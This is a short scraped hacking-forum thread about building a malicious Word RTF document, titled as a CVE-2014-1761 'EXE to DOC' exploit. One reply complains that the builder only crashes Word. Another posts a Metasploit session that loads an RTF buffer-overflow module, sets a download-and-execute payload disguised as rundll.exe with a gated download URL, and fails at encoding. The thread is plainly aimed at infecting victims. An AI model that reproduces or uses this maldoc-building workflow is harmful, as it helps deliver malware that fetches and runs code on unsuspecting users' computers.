Jump to content
YOUR-AD-HERE
HOSTING
TOOLS

Locked MS Office 2003<>2013 RTF Exploit ( EXE to DOC ) ( CVE-2014-1761 ) Latest


freaktechz

Recommended Posts

  • 3 weeks later...

Re: MS Office 2003<>2013 RTF Exploit ( EXE to DOC ) ( CVE-2014-1761 ) Latest

 

i have tried building this for awhile but it's not dropping my payload, only crash ms word but no payload being dropped. anyone has successfully work with this please share your experience

Link to comment
Share on other sites

Re: MS Office 2003<>2013 RTF Exploit ( EXE to DOC ) ( CVE-2014-1761 ) Latest

 

ok,where is error

 

msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

msf exploit(ms10_087_rtf_pfragments_bof) > set PAYLOAD windows/download_exec

PAYLOAD => windows/download_exec

msf exploit(ms10_087_rtf_pfragments_bof) > set EXE rundll.exe

EXE => rundll.exe

URL =>

This is the hidden content, please

_hash=AAEaeqQewhFEGuOclmbrwGqLJxKBCCvXkPA-s4r_3fG2sQ&expiry=1400775822

msf exploit(ms10_087_rtf_pfragments_bof) > set EXITFUNC thread

EXITFUNC => thread

msf exploit(ms10_087_rtf_pfragments_bof) > exploit

 

[-] Exploit failed: No encoders encoded the buffer successfully.

msf exploit(ms10_087_rtf_pfragments_bof) >

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.